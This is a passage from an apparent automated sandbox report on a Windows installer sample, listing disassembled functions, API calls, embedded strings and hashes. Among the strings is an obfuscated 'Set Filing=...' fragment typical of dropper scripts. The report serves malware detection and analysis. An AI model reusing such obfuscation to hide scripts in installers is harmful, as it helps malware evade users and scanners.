Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Jump: %d, xrefs: 00401602
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
BringToFront, xrefs: 004016BD
Rename: %s, xrefs: 004018F8
SetFileAttributes failed., xrefs: 004017A1
Rename on reboot: %s, xrefs: 00401943
SetFileAttributes: "%s":%08X, xrefs: 0040177B
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Sleep(%d), xrefs: 0040169D
Rename failed: %s, xrefs: 0040194B
CreateDirectory: "%s" (%d), xrefs: 004017BF
detailprint: %s, xrefs: 00401679
Aborting: "%s", xrefs: 0040161D
CreateDirectory: "%s" created, xrefs: 00401849
Call: %d, xrefs: 0040165A

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

.DEFAULT\Control Panel\International, xrefs: 00405999
RichEdit, xrefs: 00405BC4
B%F, xrefs: 00405A1F
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
RichEd32, xrefs: 00405BA8
_Nb, xrefs: 00405AD1
.exe, xrefs: 00405A3D
@%F, xrefs: 004059F6
RichEd20, xrefs: 00405B9D
@rD, xrefs: 00405965
RichEdit20A, xrefs: 00405BB6, 00405BBB

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,DatesConsider,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,DatesConsider,DatesConsider,00000000,00000000,DatesConsider,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error, user cancel, xrefs: 00401B93
File: error, user abort, xrefs: 00401B53
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user retry, xrefs: 00401B40
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
DatesConsider, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: wrote %d to "%s", xrefs: 00401BD0
File: error creating "%s", xrefs: 00401AF0

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: DatesConsider$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-2479521669
Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Error launching installer, xrefs: 004035D7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
soft, xrefs: 00403675
Inst, xrefs: 0040366C
Null, xrefs: 0040367E

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 004033ED
Set Filing=iMfVitamins-Plaza-Record-Jewish-Relationship-Purchased-Rolls-Combining-cXldIslam-Lift-Agrees-Obvious-Tight-Training-Denmark-Like-bFrTRr-Latinas-Ins-Certificate-Strategies-CoaDeviation-Ottawa-Congo-Applies-Ir-Displayed-Vault-dKeBeat-Onion-S, xrefs: 004033A9
X1C, xrefs: 0040343C
... %d%%, xrefs: 0040349E

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$Set Filing=iMfVitamins-Plaza-Record-Jewish-Relationship-Purchased-Rolls-Combining-cXldIslam-Lift-Agrees-Obvious-Tight-Training-Denmark-Like-bFrTRr-Latinas-Ins-Certificate-Strategies-CoaDeviation-Ottawa-Congo-Applies-Ir-Displayed-Vault-dKeBeat-Onion-S$X1C$X1C
API String ID: 651206458-3530543704
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(0067C688), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
DatesConsider, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: DatesConsider$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-1103588846
Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(0067C688), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
